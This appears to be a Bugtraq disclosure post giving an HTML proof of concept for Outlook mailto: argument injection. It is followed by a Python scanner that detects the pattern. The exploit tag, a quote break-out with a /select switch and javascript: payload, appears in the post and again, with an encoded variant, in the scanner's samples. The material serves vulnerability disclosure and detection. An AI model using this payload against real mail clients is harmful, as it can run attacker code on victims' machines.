Hello Bugtraq,

For those interested in testing the impact of this vulnerability, I have written a simple, non-malicious PoC for this issue:

http://www.nettwerked.co.uk/code/outlooksploit.html

If you'd rather not visit an unverified link, here's the code:

###outlooksploit.html
<!-- Outlook mailto: URL argument injection proof-of-concept exploit, by shaun2k2.
     The exploit can be easily modified to execute more malicious things. -->
<html>
<body>
<!-- This is the exploit string. -->
<img src="mailto:aa" /select javascript:alert('vulnerable')">
</body>
</html>
###EOF

If you're vulnerable, Outlook will launch and you will see an alert box saying "vulnerable". Also, depending on what version you are using, you might get an error box saying Outlook cannot load and that the command line argument was not valid. Either way, you are still vulnerable, I believe. I recommend you upgrade :).

Obviously, the exploit could be easily modified to do more malicious things, but this at least demonstrates the issue.

Thank you for your time.

Shaun.
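As an added defensive example (not part of Shaun's post or the PoC above), the following Python scanner looks for the argument-injection pattern the post describes: a mailto: URL containing a double quote that would terminate the quoted command-line argument, followed by a switch such as /select, or carrying an embedded javascript: scheme. It deliberately works on the raw tag text rather than a parsed DOM, because the payload sits where a strict HTML parser would discard it. The sample HTML, the function names and the percent-encoded variant are constructed for this example.

```python
import re
from urllib.parse import unquote

# Constructed sample page: the Bugtraq PoC tag, two benign mailto: links, and a
# percent-encoded form of the same pattern to exercise the decoding path.
SAMPLE_HTML = """
<html><body>
<a href="mailto:alice@example.com?subject=Hello%20there">mail Alice</a>
<img src="mailto:aa" /select javascript:alert('vulnerable')">
<a href="mailto:bob@example.com%22%20/select%20javascript:alert(1)">encoded</a>
<a href="mailto:carol@example.com">mail Carol</a>
</body></html>
"""

# Raw run from "mailto:" to the end of the enclosing tag. This is intentionally
# not an HTML parser: the injected text follows the src="..." value, where a
# strict parser would treat it as junk attributes, so we want the raw characters
# that a URL handler could end up placing on a command line.
MAILTO_RE = re.compile(r"mailto:[^>]*", re.IGNORECASE)

# A quote that would close the quoted URL argument, followed by whitespace and a
# switch-like token (e.g. /select or -c).
SWITCH_AFTER_QUOTE_RE = re.compile(r'["\']\s*[/-][A-Za-z]')


def extract_mailto_uris(html):
    """Return every raw mailto: run in the page, minus the attribute's closing quote."""
    uris = []
    for m in MAILTO_RE.finditer(html):
        raw = m.group(0).strip()
        # The final quote before '>' legitimately closes the attribute value;
        # any quote that remains after dropping it is inside the URL itself.
        if raw.endswith('"') or raw.endswith("'"):
            raw = raw[:-1]
        uris.append(raw)
    return uris


def suspicious_reasons(uri):
    """List the injection indicators found in one mailto: URL (empty if clean)."""
    reasons = []
    decoded = unquote(uri)  # catch %22 / %20 encodings of the same pattern
    if '"' in decoded:
        reasons.append("double quote inside URL (would terminate the quoted argument)")
    if SWITCH_AFTER_QUOTE_RE.search(decoded):
        reasons.append("command-line switch following a quote")
    if "javascript:" in decoded.lower():
        reasons.append("javascript: scheme embedded in mailto: URL")
    if "\r" in decoded or "\n" in decoded:
        reasons.append("line break inside URL")
    return reasons


def scan_html(html):
    """Return (uri, reasons) for each mailto: URL that shows injection indicators."""
    hits = []
    for uri in extract_mailto_uris(html):
        reasons = suspicious_reasons(uri)
        if reasons:
            hits.append((uri, reasons))
    return hits


if __name__ == "__main__":
    for uri, reasons in scan_html(SAMPLE_HTML):
        print(uri)
        for r in reasons:
            print("  -", r)
```

Run against the sample, the scanner flags the PoC tag and its percent-encoded twin with three indicators each, and passes the two ordinary links. The same check fits a mail gateway or web proxy that inspects HTML bodies; the mitigation remains patching the client, since the check only spots the obvious forms of the pattern.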